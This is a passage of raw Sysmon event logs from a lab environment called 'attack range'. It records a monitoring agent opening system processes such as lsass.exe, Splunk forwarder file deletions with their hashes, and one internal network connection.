Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000018939Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:51.170{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF552158C35FC6F5BADA93445A470F7C,SHA256=D9C49A7D0254AD6B38F33F4C17608C394FA282DCB99ED8D08DCAB255275086FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:52.765{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACE221359AE8E91DA7FB3073B3764A02,SHA256=CAFB91B3C03E39B5EAD3646A1DFD3441E4BBF6C416A3761E4C5112424AFBAEEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018940Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:52.257{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C7051A60D3D545A88FA02CC28DF9E01,SHA256=8781354138C574386179F8286AEB704415601B4D8E9F1F2DDDFA8A8C379607F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:50.680{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56506-false10.0.1.12-8000- 10341000x800000000000000048542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:52.215{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000048546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:53.881{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFFDB17EEA5DCD9D2D4E9A577A45E0E5,SHA256=E5091C548D12F6A371F00659DC79B081025EDEF8301E0321B548AEEE212915F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018941Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:53.313{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=696AFE867290050BF4A0A9EB4601C3F4,SHA256=33A35C307CBDB542D7E1B34423718AA59A25F1EE5DAA936A4E5F0EDFAE4C2971,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:53.281{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=01EC50AA2901789F152652C42D4D56CC,SHA256=C6DCB7AB5FB0614C5B7729F052DAFED2A615ED6987F3510ED6407C53B391D106,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018942Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:54.400{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB2DD3DECD3386AA52EFBA75473894EE,SHA256=6803C7BFBA92B2608181C24E6C704E63133767F3F9B0D54A09ED576E368587A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000048576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.868{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.861{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.859{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.848{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.846{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.838{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.780{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.776{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.775{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.770{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.767{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.763{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.762{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:54.761{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 